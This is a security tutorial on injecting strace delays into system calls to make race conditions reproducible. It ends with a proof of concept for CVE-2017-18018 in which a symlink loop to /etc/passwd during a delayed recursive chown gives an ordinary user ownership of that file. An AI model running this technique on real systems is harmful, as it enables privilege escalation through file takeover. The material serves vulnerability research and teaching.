Exploiting Race Conditions with strace

As a security professional and hobbyist, I often deal with security vulnerabilities that are caused by race conditions. By their very nature, race conditions are nondeterministic, which makes them hard to diagnose, difficult to reproduce, and tedious to debug. They can cause serious security vulnerabilities and go quietly undetected for years. Once a race condition has been patched, it can be very difficult to prove that the race condition has been properly mitigated.

If there were a way to make race conditions behave deterministically, it would save time in the discovery and debugging phase of vulnerability research. Furthermore, the Proof of Concept (PoC) exploits for race conditions would more reliably reproduce the vulnerabilities. Luckily, strace v4.22 and later allow delays to be injected into specific system calls. By injecting delays into the target application, we can take some of the headache out of working with race conditions by ensuring that both the vulnerable code and the PoC exploit behave more predictably.

What Is a Race Condition?

The term “race condition” is very well-defined by Devopedia:

Race condition in software is an undesirable event that can happen when multiple entities access or modify shared resources in a system. The system behaves correctly when these entities use the shared resources as expected. But sometimes due to uncontrollable delays, the sequence of operations may change due to relative timing of events. When this happens, the system may enter a state not designed for and hence fail. The “race” happens because this type of failure is dependent on which entity gains access to the shared resource first.

A program is only able to utilize the CPU when the kernel allows it. The kernel attempts to ensure that each program gets its fair share of time on the CPU. In order to do this, the kernel may periodically preempt the currently running process and resume it later. This means that, if there are two or more threads/processes that are simultaneously working with the same set of shared resources (e.g., files or memory addresses), we cannot know the order in which each process will operate on the shared resource in advance of runtime; it is nondeterministic. Race conditions can occur when the order in which these threads/processes operate on a shared resource is not properly controlled.

A Crash Course in strace

At a high level, what you need to understand about system calls is:

  1. An application cannot take any privileged action (e.g., accessing hardware) on its own.
  2. If an application wishes to perform some privileged operation, such as modifying a file’s permissions, it makes a request to the kernel. The kernel will then perform that operation on behalf of the application.
  3. System calls are the interface that the kernel provides so that applications can request privileged operations.
Figure 1. System Call Interface
Credit: https://manybutfinite.com/post/system-calls

For every way an application can interact with the rest of the system, the kernel provides a system call. Need to read or write a file? There’s a system call. Want to send traffic over the network? You’ll need a system call. Does the application need to allocate memory? You guessed it: system call.

The strace utility allows us to observe all of the system calls made by an application. For example, we can use strace to observe the chown command and learn how the chown command goes about changing the ownership of a file or directory:

root@sec-disco-amd64:~$ touch /tmp/testfile
root@sec-disco-amd64:~$ ls -l /tmp/testfile
-rw-r--r-- 1 root root 0 Dec 29 17:53 /tmp/testfile
root@sec-disco-amd64:~$ strace -f chown testuser /tmp/testfile | grep testfile
4446  execve("/usr/bin/chown", ["chown", "testuser", "/tmp/testfile"], 0x7ffcc48ddfa8 /* 16 vars */) = 0
4446  newfstatat(AT_FDCWD, "/tmp/testfile", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
4446  fchownat(AT_FDCWD, "/tmp/testfile", 1001, -1, 0) = 0
root@sec-disco-amd64:~$ ls -l /tmp/testfile
-rw-r--r-- 1 testuser root 0 Dec 29 17:53 /tmp/testfile
root@sec-disco-amd64:~$ 

We can see on line 8 that the chown command uses the fchownat() system call in order to change the ownership of /tmp/testfile to the user with ID 1001. We can get more information about the fchownat() system call by consulting its man page: man 2 fchownat.

I could write 20 posts just on the usefulness of strace, but others have already done a great job. See the Further Reading section for more information about system calls and strace.

Using strace to Make Race Conditions More Deterministic

So, what does strace have to do with race conditions? Well, strace allows us to do more than just observe system calls; it allows us to tamper with those system calls, too. One way that strace allows us to tamper with system calls is by injecting delays.

By injecting delays into system calls, we are, in effect, coaxing the kernel into preempting the process. When a delay is injected into a system call, the process making that call gets put to sleep. This frees up the CPU and prompts the kernel to schedule a different process to run. Thus, by injecting delays into system calls, we decrease the randomness of when the process is preempted.

In order to use strace to inject delays into system calls, we use the -e inject option and provide a comma-separated list of system calls to be tampered with, as well as the number of microseconds to delay the system calls.

strace -e inject=LIST_OF_SYSTEM_CALLS:delay_exit=USECS COMMAND

The command below injects a delay of 1,000,000 microseconds (or one second) into the newfstatat() and fchownat() system calls that are called by the chown command. The -o /dev/null option sends strace’s output to /dev/null to keep it from cluttering up the screen. The time command at the very beginning is optional. It will show the total time that strace took to run. Since we’ve injected a one-second delay into two system calls that are each called one time, the total delay added to the command is two seconds. Therefore, the time command should show us that the total time to run strace chown took a little over two seconds.

$> time strace -e inject=newfstatat,fchownat:delay_exit=1000000 -o /dev/null chown testuser /tmp/testfile

real    0m2.014s
user    0m0.005s
sys     0m0.008s
$>

Note that strace allows the user to specify delay_enter and/or delay_exit. This allows the user to control whether or not the delay occurs just before the system call executes or just after.

Example: CVE-2017-18018

CVE-2017-18018 has been assigned to a race condition in the chown and chgrp commands. This race condition allows a regular user to potentially change the ownership of arbitrary files. A full explanation and a PoC exploit for this vulnerability can be found here.

I ran the PoC exploit on my local machine 10 times and found that it was never successful. Now, I’m sure if I ran it 1,000,000 times, it would be successful at least once, but I don’t always have the time or patience to script something up and allow it to run indefinitely until it succeeds. Below, you’ll see a slightly modified version of the PoC. It uses strace to increase the determinism of the vulnerable application (i.e., chown). By using the delay_exit capability of strace, I was able to successfully exploit the vulnerability 100% of the time.

  Terminal 1 (root)
  -----------------
  sudo mkdir -p /var/www/chown-test && cd /var/www
  sudo mkdir chown-test/foo
  sudo mkdir chown-test/bar
  sudo ln -s ../bar chown-test/foo/quux
  sudo touch chown-test/bar/baz

  Terminal 2 (testuser)
  -----------------------
  cd /var/www/chown-test/bar
  while true; do ln -s -f /etc/passwd ./baz; done;

  Terminal 1 (root)
  -----------------
  sudo strace -o /dev/null -e inject=fchownat:delay_exit=1000000 chown --recursive --verbose -L testuser chown-test
  ls -l /etc/passwd

This outputs,
  -rw-r--r-- 1 testuser root 1.5K 2017-12-17 18:34 /etc/passwd

Further Reading

Race Conditions

System Calls and strace

CVE-2017-18018